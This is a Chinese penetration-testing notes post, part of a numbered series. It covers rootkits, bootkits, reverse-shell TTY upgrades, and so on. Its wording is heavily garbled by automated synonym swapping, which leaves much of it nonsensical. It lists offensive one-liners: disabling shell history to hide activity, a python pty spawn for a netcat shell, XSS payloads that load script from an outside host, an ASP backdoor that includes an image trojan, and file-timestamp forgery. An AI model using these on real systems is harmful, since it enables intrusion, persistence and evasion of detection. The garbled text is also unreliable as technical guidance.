【渗透笔记】柒

【浸透条记】柒

1.提权后进入长途桌面缔造 desktop locker（桌面锁）
办理舆论：
ctrl+shift+esc １直按会出现资源意图器，鼠标完毕desktop locker便可

2.３389低权限用户提权(这个环境似乎对照少见？)的时候或许集体浸透用软件的时候或是

• subst x: D:\XXX 用下令竖立 X盘符

• 长途桌面毗邻器-外地资源-详细信息 -驱动器-勾选新增的X盘符

或是把外地驱动器映射到长途３389服务器上的X盘，放上少用提权器械随意任性浸透。

３.Rootkits：

Rootkits是linux/unix获取root权限当前使得攻打者或是暗藏大家的奇观和保管root会面权限的神器，通常攻打者利用 rootkit的搜查系统搜查能否有其它的用户登录，若是只要大家，攻打者就起头入手清理日志中的有关信息，颠末rootkit的嗅探器还或是取得其它系 统的用户和暗码！

今朝少用的有：t0rn /mafix/enyelkm 等等。

Rootkits通常分为：垄断级别—内核级别—-硬件级别，早期的是rootkit主要为垄断级rootkit颠末更调login、ps、ls、 netstat等系统器械或修改.rhosts等系统配置文件等实现暗藏后门，硬件级RootKits主若是指Bios Rootkits，大要在系统加载前取得管束权，颠末向磁盘中写入文件，再由引导步伐加载该文件从头取得管束权也或是采纳编造机技术，使全体利用系统运行 在rootkit掌握之中，今朝常见的rootkit是内核级rootkit，颠末间接修改内核来增加暗藏代码实现管束系统的服从。

最为冗杂实用的垄断级别Rootkit是颠末将增加过提权代码的下令更调系统华夏始的下令来实现服从的，并且１般提供清理器械删除wtmp、 utmp、lastlog等日志文件中大家的行迹，并且烦复点的rootkit还或是向攻打者提供telnel、shell和finger等服务。

４.LKM暗藏技术：

LKM便是可装载内核模块(Loadable Kernel Modules)。这些模块副本是Linux系统用于扩大其服从的。

木马最大的赋性便是窜伏性，不能方便让人察觉，所以暗藏木马干系信息是关头的成份。对于Linux利用系统来讲，主要有静态暗藏和音讯暗藏两个标准。

由于Linux巨匠的安然性，想操作外壳步伐暗藏木马文件和进程不行能实现，所以就借要颠末修改Linux内核的系统调用来暗藏木马干系信息，这便是LKM技术。

5.Bootkit：Bootkit是更初级的Rootkit,该概念劈脸于2005年被eEye Digital公司在他们的“BootRoot”技俩中说起。它主要操作其内应允入和开机历程的隐身技术，当在服从上并没有异于Rootkit。他们的分歧 主要示意在获取准入的方式上。古板的rootkit操作系统带动时晋升权限。而Bootkit是被装置在外设的主引导扇区和驻留在全系齐备的带动历程。

Bootkit的引导扇区代码老是在ROM BIOS实验后主引导记录被载入前劫持系统带动步伐。１旦被载入到内存，代码便实验停止指令，也便是俗称的HOOK挂钩。它挂接到INT 1３指挥后续扇区读取其信息。这个历程实现后，Bootkit试图旋转引导历程的结座谈利用逻辑流程。

6.用nst的反弹后门连上nc后不能su交互，报错下列：
standard?in?must?be?a?tty
办理舆论：

Default python -c ’import pty; pty.spawn(“/bin/sh”)’

1	python -c ’import pty; pty.spawn(“/bin/sh”)’

取得shell便或是su进行交互了。

 

七.history不记录：

Default unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

1	unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

 

8、大家尝试最短的引入内部脚本的xss payload(28个字符):

<script src=http://e1v.cn/pj

注:e1v.cn是短域名转换

 

9、 有文章称<script?src=//xxx.xxx/a.js></script>也或是插入，然而实测证实，不是每个浏览器都支持没有http：的插入。要有效牢靠的插入，还是参考上１条的插入舆论。

 

10、实在要短得不可的，那就分隔隔离分散来插吧：

<script>var a=’alert’</script> <script>var b=’(“xss”)’</script> <script>var c=a+b </script> <script> eval(c) </script> 十一、C类IP地址：C类数字沟通的IP地址，一般为同１台服务器大概处于同１网络上的服务器。所以若是两 个网站IP地址前３个数字沟通，如198.19七.196.195和198.19七.196.19４，搜寻引擎会认为这两个网站之间是有１定关连的，很可 能在同１架服务器上。 12、URL静态化：颠末URL重写技术，将音讯URL转化为静态URL。在LAMP主机上，URL重写一般为颠末mod_rewrite模块；在windows主机上，一般为颠末ISAPI Rewrite大概 IIS Rewrite模块。 1３、在nmap目次下有很多扫描脚本，或是实现很多智能化的服从，具体在/nmap/scripts这个目次下：利用舆论：
Default nmap -P0 <strong>--script= smb-check-vulns</strong> 192.168.XXX.XX

1	nmap -P0 <strong>--script= smb-check-vulns</strong> 192.168.XXX.XX

1４、少用的nmap扫描模范参数主要有： -sT ? ? ? TCP connect扫描 -sS ? ? ? TCP SYN扫描 -sF -sX -sN ? ? 颠末设置１些不凡的标记位来避开防火墙的检测 -sP ? ? ?操作ping来探测主机能否存活 -sU ? ? ?探测主机落莫了哪些UDP端口 -sA ? ? ?TCP ACK扫描 -sV ? ? 探测端口下面运行的详细信息 15、少用的nmap扫描选项有： -O ? ? ? ? ? 探测主机利用系统 -A ? ? ? ? ? 对照初级的主机旗标探测 -Pn ? ? ? ?不操作ping下令来探测主机能否存活 -F ? ? ? ? ? 快速扫描模式 -p<端口范围>

 

16、利用icyfox-time.exe修改文件的时间属性：

Default icyfox-time.exe "e:\网站\yuan.asp" e:\网站\gai.asp

1	icyfox-time.exe "e:\网站\yuan.asp" e:\网站\gai.asp

留意:第１个文件阶梯必要用双引号,第二个不必要。多么就把”e:\网站\gai.asp”这个文件的时间改为和”e:\网站\yuan.asp”文件１样啦。
1七、加倍窜伏的asp网站留后门的舆论：

上传１只１句话图片马，具体制造舆论请拜会“图种技术”；然后在你要插入１句话的页面里插入１下代码语句：

Default &lt;!--#include file="图片马阶梯"--&gt;

1	<!--#include file="图片马阶梯"-->

 

18、关于上传裂缝的检测步骤：

(1).上传文件能否有花样限定,能否或是上传exe文件；

(2).上传文件能否有大小限定,上传太大的文件能否招致特别很是纰谬,上传0K的文件能否会招致特别很是纰谬,上传其实不存在的文件能否会招致特别很是纰谬；

(３).颠末修改扩大名的方式能否或是绕过花样限定，能否或是颠末压包方式绕过花样限定；

(４).能否有上传空间的限定,能否或是超过空间所限定的大小,如将超过空间的大文件拆分上传能否会出现特别很是纰谬。

(5).上传文件大小大于外地残存空间大小，能否会出现特别很是纰谬。

(6).关于上传能否成功的武断。上传历程中，停止。步伐能否武断上传能否成功。

(七).对于文件名中带有中翰墨符，不凡字符等的文件上传。

 

19、跨站要求虚构（CSRF）

(1).同个浏览器翻开两个页面，１个页面权限失效后，另１个页面能否可利用成功。

(2).当页面没有考证码时，搜查页面源代码，查是能否有token。若是页面彻底是阐扬解析页面，是不会有token的。

传递门：《【浸透条记】陆》《【浸透条记】伍》 本文为学习条记，作者为91ri.org团队。